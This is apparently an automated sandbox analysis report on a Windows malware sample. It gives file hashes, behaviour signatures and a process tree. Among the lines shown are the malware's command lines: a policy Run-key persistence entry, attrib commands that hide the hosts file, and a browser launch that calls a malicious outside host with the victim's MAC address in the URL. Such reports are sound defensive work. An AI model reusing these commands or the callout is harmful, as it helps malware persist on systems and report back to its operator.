Analysis
- max time kernel: 150s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64 arch:x86 image:win10v2004-20231215-en locale:en-us os:windows10-2004-x64 system
- submitted: 05-01-2024 19:28
Static task: static1
Behavioral task: behavioral1
- Sample: 4440a230e8ca193cc3cf2f4d0b535358.exe
- Resource: win7-20231215-en
Behavioral task: behavioral2
- Sample: 4440a230e8ca193cc3cf2f4d0b535358.exe
- Resource: win10v2004-20231215-en
General
- Target: 4440a230e8ca193cc3cf2f4d0b535358.exe
- Size: 46KB
- MD5: 4440a230e8ca193cc3cf2f4d0b535358
- SHA1: df64278b8498fb4020b99774260d2b526da051d3
- SHA256: 0259fedbd9c3c260c01ad6bd9be17dd2e7902a4c35d857b6378a8ddeab91db80
- SHA512: c5347f037e32510293909538a15c70c2a17f3261ede313923acda35f149b0b410efc0cc2ede27ac8e6b3387cd50304657f3c3ef061036d19353435b423172935
- SSDEEP: 768:SMVvp3w/z5K2u2QeGooyw765XOMD+fYzYcNxHSS1zL1Jdh2zUoxMak8nRD6MzW+8:SMVvp3w/zATFPU5X3DvzJFSS1zL1Jdhv
Malware Config
Signatures
Adds policy Run key to start application 2 TTPs 2 IoCs
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run (process: 4440a230e8ca193cc3cf2f4d0b535358.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\qq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4440a230e8ca193cc3cf2f4d0b535358.exe" (process: 4440a230e8ca193cc3cf2f4d0b535358.exe)
Drops file in Drivers directory 1 IoCs
- File opened for modification: C:\Windows\system32\drivers\etc\hosts (process: 4440a230e8ca193cc3cf2f4d0b535358.exe)
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
- PID 3076: attrib.exe
Drops file in Windows directory 1 IoCs
- File opened for modification: C:\Windows\win.ini (process: 4440a230e8ca193cc3cf2f4d0b535358.exe)
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses 4 IoCs
- PID 4932: 4440a230e8ca193cc3cf2f4d0b535358.exe (4 identical entries)
Suspicious use of AdjustPrivilegeToken 2 IoCs
- Token: 33, PID 4976: AUDIODG.EXE
- Token: SeIncBasePriorityPrivilege, PID 4976: AUDIODG.EXE
Suspicious use of FindShellTrayWindow 64 IoCs
- PID 216: iexplore.exe
- PID 4932: 4440a230e8ca193cc3cf2f4d0b535358.exe (remaining entries are repeats of this PID)
Suspicious use of SendNotifyMessage 64 IoCs
- PID 4932: 4440a230e8ca193cc3cf2f4d0b535358.exe (all entries are repeats of this PID)
Suspicious use of SetWindowsHookEx 6 IoCs
- PID 216: iexplore.exe (2 entries)
- PID 4496: IEXPLORE.EXE (4 entries)
Suspicious use of WriteProcessMemory 13 IoCs
- PID 4932 wrote to memory of 1828; process 4440a230e8ca193cc3cf2f4d0b535358.exe; procid_target 94 (3 entries)
- PID 4932 wrote to memory of 3076; process 4440a230e8ca193cc3cf2f4d0b535358.exe; procid_target 96 (3 entries)
- PID 4932 wrote to memory of 216; process 4440a230e8ca193cc3cf2f4d0b535358.exe; procid_target 106 (2 entries)
- PID 216 wrote to memory of 4496; process iexplore.exe; procid_target 107 (3 entries)
- PID 4932 wrote to memory of 3408; process 4440a230e8ca193cc3cf2f4d0b535358.exe; procid_target 34 (2 entries)
Views/modifies file attributes 1 TTPs 2 IoCs
- PID 1828: attrib.exe
- PID 3076: attrib.exe
Processes
- C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  PID:3408
  - C:\Users\Admin\AppData\Local\Temp\4440a230e8ca193cc3cf2f4d0b535358.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\4440a230e8ca193cc3cf2f4d0b535358.exe"
    PID:4932
    Signatures:
    - Adds policy Run key to start application
    - Drops file in Drivers directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\attrib.exe
      Command line: attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
      PID:1828
      Signatures:
      - Views/modifies file attributes
    - C:\Windows\SysWOW64\attrib.exe
      Command line: attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
      PID:3076
      Signatures:
      - Sets file to hidden
      - Views/modifies file attributes
    - C:\program files\internet explorer\iexplore.exe
      Command line: "C:\program files\internet explorer\iexplore.exe" "http://xy80000.cn/union/install.asp?ver=090102&tgid=qq88&address=FE-BF-AF-18-64-CB&regk=1&flag=7abc2ea7d12e51c22931738aaae19422&frandom=230"
      PID:216
      Signatures:
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:216 CREDAT:17410 /prefetch:2
        PID:4496
        Signatures:
        - Modifies Internet Explorer settings
        - Suspicious use of SetWindowsHookEx
- C:\Windows\system32\AUDIODG.EXE
  Command line: C:\Windows\system32\AUDIODG.EXE 0x398 0x4e0
  PID:4976
  Signatures:
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 16KB
- MD5: 107cccfc6edc9b518247185c3737ba3a
- SHA1: e8a3ea2403830c6db6637a448aabd432117ab980
- SHA256: 70f220316f267647656d245668193f3effae66819a0f6d12e3999891d7957a4f
- SHA512: d30844afd75e5335234e1bce2b08b3d4bf9070ab1b838cd628f0230914f1a5bcb6bc1d15bdacc164a221a40b29a943e103ca5aac58c237d7bb418aa8916f2c0b